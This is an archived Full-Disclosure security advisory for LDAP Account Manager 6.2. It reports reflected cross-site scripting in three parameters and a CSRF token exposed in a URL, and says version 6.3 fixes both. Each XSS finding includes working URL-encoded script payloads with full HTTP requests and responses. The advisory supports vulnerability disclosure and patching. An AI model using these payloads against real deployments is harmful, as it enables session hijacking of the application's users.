lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAOON2DGz28Rt1B1kGP++tPUjorKqQON_dxtqbpeCRUiexM9Fjg@mail.gmail.com> Date: Wed, 21 Mar 2018 12:19:56 +0100 From: Michał Kędzior <michal.kedzior1478@...il.com> To: fulldisclosure@...lists.org Subject: [FD] LDAP Account Manager (6.2) CVE-2018-8763, CVE-2018-8764 Affected Software: LDAP Account Manager (6.2) Pentester: Michał Kędzior <michal[dot]kedzior147[at]gmail[dot]com> CVE: CVE-2018-8763, CVE-2018-8764 Vulnerabilities : ***************** 1. Cross-site scripting (reflected) CVE-2018-8763 : ================================ Risk: HIGH Summary: *********** Reflected Cross Site Scripting vulnerability has been found during the test. It allows for injecting and executing JavaScript code in the application context. JavaScript code is only reflected by the server, which differs from Stored Cross-Site Scripting that stores code in the application permanently. This vulnerability is mostly exploited in order to hijack authenticated users sessions. It can also be used to redirect users to malicious websites or steal application user's keystokes. Proof: ******* I. Vulnerable parameter dn: ===================== Request with payload [%3cscript%3ealert(document.domain)%3c%2fscript%3e]: GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_attr_ form&server_id=1&dn=cn%3xxxxx%2cou%3dpeople%2cdc%3dpl%2cdc% 3ds2-eu%2cdc%3dxxxx%2cdc%3dlocalru0bz%3cscript%3ealert( document.domain)%3c%2fscript%3eu89iu HTTP/1.1 Host: XXXXXXXXXX Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: XXXXXXXXX Cookie: XXXXXXXXXX Response with execution point [<script>alert(document.domain)</script>]: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Length: 12887 Content-Security-Policy: frame-ancestors 'self' Content-Type: text/html; charset="UTF-8" Date: Fri, 02 Mar 2018 09:52:18 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache/2.4.29 (Debian) Vary: Accept-Encoding X-Frame-Options: sameorigin Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" " http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>LDAP Account Manager (6.2) - </title><link rel="shortcut icon" href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet" href="css/default/style.css" /><link type="text/css" rel="stylesheet" media="all" href="js/jscalendar/calendar-blue.css" title="blue" /> <script type="text/javascript" src="js/ajax_functions.js"></script><script type="text/javascript" src="js/jscalendar/calendar.js"></script> </head> […] </div></td><td class="body" style="width: 80%;"><div id="ajBODY"> <table class="sysmsg"><tr><td class="icon" rowspan="2"><img src="images/default/error-big.png" alt="error" /></td><td class="head">Error</td></tr><tr><td class="body">The entry (cn=xxxxx,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=localru0bz< script>alert(document.domain)</script>u89iu) does not exist.</td></tr></table> <table class="body"><tr><td></td></tr></table></div></td></tr> </table></body></html> II. Vulnerable parameter template: ======================== Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript% 3e]: GET /lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=rename_ form&server_id=1&dn=cn%3Dtechnic%2Cou%3Dpeople%2Cdc% 3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal&template= noneuaax6%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev7rfn HTTP/1.1 Host: xxxxxxx Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Response with execution point ["><script>alert(document.domain)</script>]: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Length: 22141 Content-Security-Policy: frame-ancestors 'self' Content-Type: text/html; charset="UTF-8" Date: Fri, 02 Mar 2018 11:22:27 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache/2.4.29 (Debian) Vary: Accept-Encoding X-Frame-Options: sameorigin Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" " http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="auto"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>LDAP Account Manager (6.2) - cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxxx,dc=local </title><link rel="shortcut icon" href="images/favicon.ico" type="image/vnd.microsoft.icon" /><link type="text/css" rel="stylesheet" href="css/default/style.css" /><link type="text/css" rel="stylesheet" media="all" href="js/jscalendar/calendar-blue.css" title="blue" /> <script type="text/javascript" src="js/ajax_functions.js"></script><script type="text/javascript" src="js/jscalendar/calendar.js"></script> </head> […] </div></td><td class="body" style="width: 80%;"><div id="ajBODY"> <table class="body"><tr><td><h3 class="title">Rename <b>cn=technic</b></h3><h3 class="subtitle">DN: <b>cn=technic,ou=people,dc=pl,dc=s2-eu,dc=xxx,dc=local</b></h3><center>Rename <b>cn=technic</b> to a new object.<br /><br /><form action="cmd.php?cmd=rename" method="post" /><input type="hidden" name="server_id" value="1" /><input type="hidden" name="dn" value="cn%3Dtechnic%2Cou%3Dpeople%2Cdc%3Dpl%2Cdc%3Ds2-eu%2Cdc%3Dxxxx%2Cdc%3Dlocal" /><input type="hidden" name="template" value="noneuaax6"><script> alert(document.domain)</script>v7rfn" /><input type="text" name="new_rdn" size="30" value="cn=technic" /><input type="submit" value="Rename" /></form></center> </td></tr></table></div></td></tr> </table></body></html> III. Vulnerable parameter type: ===================== Request with payload [%22%3e%3cscript%3ealert(document.domain)%3c%2fscript% 3e]: GET /lam/templates/upload/masscreate.php?type=userawvpj% 22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ev0car HTTP/1.1 Host: xxxxx Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: xxxxxx Cookie: xxxxxx Response with execution point ["><script>alert(document.domain)</script>]: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Length: 8418 Content-Security-Policy: frame-ancestors 'self' Content-Type: text/html; charset=UTF-8 Date: Fri, 02 Mar 2018 11:10:05 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache/2.4.29 (Debian) Vary: Accept-Encoding X-Frame-Options: sameorigin Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" " http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="pragma" content="no-cache"> <meta http-equiv="cache-control" content="no-cache"><link rel="shortcut icon" type="image/x-icon" href="../../graphics/favicon.ico"> <link rel="icon" href="../../graphics/logo136.png"> <title>LDAP Account Manager (directoryservice:389)</title> […] <div class="userawvpj"><script>alert(document.domain)</script>v0car-bright smallPaddingContent"><div class="title"> <h2 class="titleText">Account creation via file upload</h2> </div><p> </p> <p> Here you can create multiple accounts by providing a CSV file.</p> <p> </p> <form enctype="multipart/form-data" action="masscreate.php" method="post"> <table> <tr> <td > <div class="nowrap">Account type</div> </td> <td> <select class="ui-corner-all" name="type" id="type" size="1" onchange="changeVisibleModules(this);" tabindex="1"> <option value="group">Groups</option> <option value="user">Users</option> </select> </td> […] Remediation: *************** Vulnerabilities has been fixed by vendor in version 6.3 2. CSRF token in URL CVE-2018-8764 ================= Risk: LOW Summary: ************ Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker. Proof: ******* Request witch reveals CSRF token [sec_token=1045368361844]: GET /lam/templates/misc/ajax.php?function=passwordChange&sec_token=1045368361844 HTTP/1.1 Host: xxxx Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: xxxxx Cookie: xxxxxx Remediation: *************** Vulnerability has been fixed by vendor in version 6.3 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists